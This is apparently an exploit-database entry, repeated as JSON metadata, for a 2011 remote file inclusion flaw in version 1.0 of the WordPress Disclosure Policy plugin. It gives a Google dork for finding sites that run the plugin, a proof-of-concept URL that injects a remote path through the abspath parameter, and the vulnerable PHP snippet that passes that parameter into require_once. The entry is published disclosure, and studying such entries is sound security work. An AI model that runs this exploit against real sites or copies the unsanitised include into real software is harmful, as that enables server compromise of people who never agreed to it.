Search...

WordPress Plugin Disclosure Policy 1.0 - Remote File Inclusion

2011-09-19T00:00:00

ID EXPLOITPACK:EA3DC2F6506870AF464064F1AE7E466D
Type exploitpack
Reporter Ben Schmidt
Modified 2011-09-19T00:00:00

Description

WordPress Plugin Disclosure Policy 1.0 - Remote File Inclusion

                                        
                                            # Exploit Title: Disclosure Policy Plugin Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/disclosure-policy-plugin
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/disclosure-policy-plugin/download/
# Version: 1.0 (tested)

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/disclosure-policy-plugin/functions/action.php?delete=asdf&blogUrl=asdf&abspath=RFI

---
Vulnerable Code
---
if(isset($_GET['delete']))
{
   global $wpdb, $wp_rewrite, $allowedtags, $user_ID;
        $table_prefix1 = "dpp_";

        $tags_ID = (int) $_GET['id'];
    $abspath = $_GET['abspath'];
        $blogUrl = $_GET['blog_url'];
    require_once($abspath . '/wp-config.php')

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:05:07", "references": [], "description": "\nWordPress Plugin Disclosure Policy 1.0 - Remote File Inclusion", "edition": 1, "reporter": "Ben Schmidt", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2011-09-19T00:00:00", "title": "WordPress Plugin Disclosure Policy 1.0 - Remote File Inclusion", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:05:07", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2020-04-01T19:05:07", "rev": 2}, "vulnersScore": -0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2011-09-19T00:00:00", "id": "EXPLOITPACK:EA3DC2F6506870AF464064F1AE7E466D", "href": "", "viewCount": 3, "sourceData": "# Exploit Title: Disclosure Policy Plugin Wordpress plugin RFI\n# Google Dork: inurl:wp-content/plugins/disclosure-policy-plugin\n# Date: 09/19/2011\n# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)\n# Software Link: http://wordpress.org/extend/plugins/disclosure-policy-plugin/download/\n# Version: 1.0 (tested)\n\n---\nPoC\n---\nhttp://SERVER/WP_PATH/wp-content/plugins/disclosure-policy-plugin/functions/action.php?delete=asdf&blogUrl=asdf&abspath=RFI\n\n---\nVulnerable Code\n---\nif(isset($_GET['delete']))\n{\n global $wpdb, $wp_rewrite, $allowedtags, $user_ID;\n $table_prefix1 = \"dpp_\";\n\n $tags_ID = (int) $_GET['id'];\n $abspath = $_GET['abspath'];\n $blogUrl = $_GET['blog_url'];\n require_once($abspath . '/wp-config.php')", "cvss": {"score": 0.0, "vector": "NONE"}}